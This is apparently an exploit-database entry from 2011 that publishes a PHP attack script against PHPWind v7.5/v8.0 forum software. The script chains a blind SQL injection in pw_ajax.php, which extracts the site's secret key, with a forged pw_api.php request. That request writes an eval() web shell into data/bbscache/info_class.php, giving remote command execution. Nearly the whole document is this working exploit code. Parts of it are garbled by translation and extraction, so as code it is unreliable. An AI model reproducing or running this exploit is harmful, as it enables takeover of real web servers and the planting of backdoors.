PHPWind v7. 5 / v8. 0 vulnerability EXP-vulnerability warning-the black bar safety net

2011-03-06T00:00:00
ID MYHACK58:62201129637
Type myhack58
Reporter 佚名
Modified 2011-03-06T00:00:00

Description

PHPWind v7. 5 / v8. 0 vulnerability EXP theme keywords: phpwind7. 5

Affected version: PHPWind v7. 5 / v8. 0

Command :php pking.php user passhttp://www. xxxx. com/

pking.php: Copy the contents to the clipboard the program code <? php

echo"

Info: Poc for Phpwind remote command execution

Test: exploit.php user password[/url]

";

if($argc<3){

echo "\r\n parameter missing\r\n";

die();

}

$user=$argv[1];

$pass=$argv[2];

$pwurl=$argv[3];

$myheader=array(

'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8',

'Accept-Language: EN-us,EN;q=0.5',

'Accept-Charset: gb2312,utf-8;q=0.7,*;q=0.7',

'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',

'Referer:http://www. tick. org/',

'Connection: Keep-Alive',

'Cache-Control: no-cache',

'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; . NET CLR 2.0.50727; InfoPath. 2)'

);

$cookie="";

$str=curlsend("$pwurl/login.php?"," POST",0,$myheader,"forward=&jumpurl=http%3A%2F%2F127. 0. 0. 1%2FPHPWind/upload%2F&step=2&lgt=0&pwuser=$user&pwpwd=$pass&hideid=0&cktime=3 1 5 3 6 0 0 0&submit=%B5%C7%C2%BC",1);

preg_match_all("/Set-Cookie:([^;]+)/is",$str,$array);

for($i=0;$i<count($array[1]);$i++){

$cookie=$cookie.";".$ array[1][$i];

}

//echo $cookie;

$test = curlsend('$pwurl/pw_ajax.php',"POST",0,$myheader,",1);

if(strpos($test,'<ajax>')) {

die('user password or other parameter error');

}

$shellcode="action=pcdelimg&fieldname=db_value%20from%20pw_config%20where%20db_name%20like%200x64625f736974656f776e65726964%20and%20db_value%20like%200x{offset}2 5%20union%20select%200x612e2e;%2 3";

$hash="0123456789abcdef";

$craked="";

for($i=0;$i<3 2;$i++){

for($n=0;$n<1 6;$n++){

$tmp=str_replace("{offset}",bin2hex($craked.$ hash[$n]),$shellcode);

$tmp=curlsend("$pwurl/pw_ajax.php","POST",0,$myheader,$tmp,0);

if(strpos($tmp,"pw_config")){

echo "CrackEd Offset ". ($i+1)." :".$ hash[$n]."\ r\n";

$craked=$craked.$ hash[$n];

break;

}

}

}

echo "Craked Magicdata :".$ craked."\ r\n";

echo "Get the shell :";

//another 0day

$arg=";

$hack = array();

$hack['mode'] = 'Other';

$hack['method'] = 'threadscateGory';

$hack['params'] = 'a:1:{s:3:"cid";a:1:{s:3:"cid";a:1:{s:3:"cid";s:2 1:"\'. eval($_GET[c]).\' abc";}}}';

$hack['type'] = 'app';

$hack = strips($hack);

ksort($hack);

reset($hack);

foreach ($hack as $key => $value) {

if ($value && $key != 'sig') {

$arg .= "$key=$value&";

}

}

$arg.=' sig='. md5($arg.$ craked);

echo file_get_contents("$pwurl/pw_api.php?".$ arg);

echo "OK\r\n";

$str=file_get_contents("$pwurl/data/bbscache/info_class. php? c=echo%20Just_wooyun;");

if(strpos($str,'tick')){

echo "Got shell :"."$ pwurl/data/bbscache/info_class. php? c=phpinfo();";

echo "\r\nOver!";

}

function strips($param) {

if (is_array($param)) {

foreach ($param as $key => $value) {

$param[$key] = strips($value);

}

} else {

$param = stripslashes($param);

}

return $param;

}

function curlsend($url,$method=false,$ssl=0,$myheader,$data=",$header=0){

global $cookie;

$ch = curl_init();

$timeout = 0; // set to zero for no timeout

curl_setopt ($ch, CURLOPT_URL, $url);

curl_setopt ($ch, CURLOPT_POST, $method);

curl_setopt($ch,CURLOPT_HTTPHEADER,$myheader);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

curl_setopt ($ch, CURLOPT_COOKIE, $cookie);

if($data){

curl_setopt ($ch, CURLOPT_POSTFIELDS,$data);

}

curl_setopt ($ch, will be, $header);

if($ssl){

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);

}

$handles = curl_exec($ch);

curl_close($ch);

//echo $handles;

return $handles;

}

data/bbscache/info_class.php password c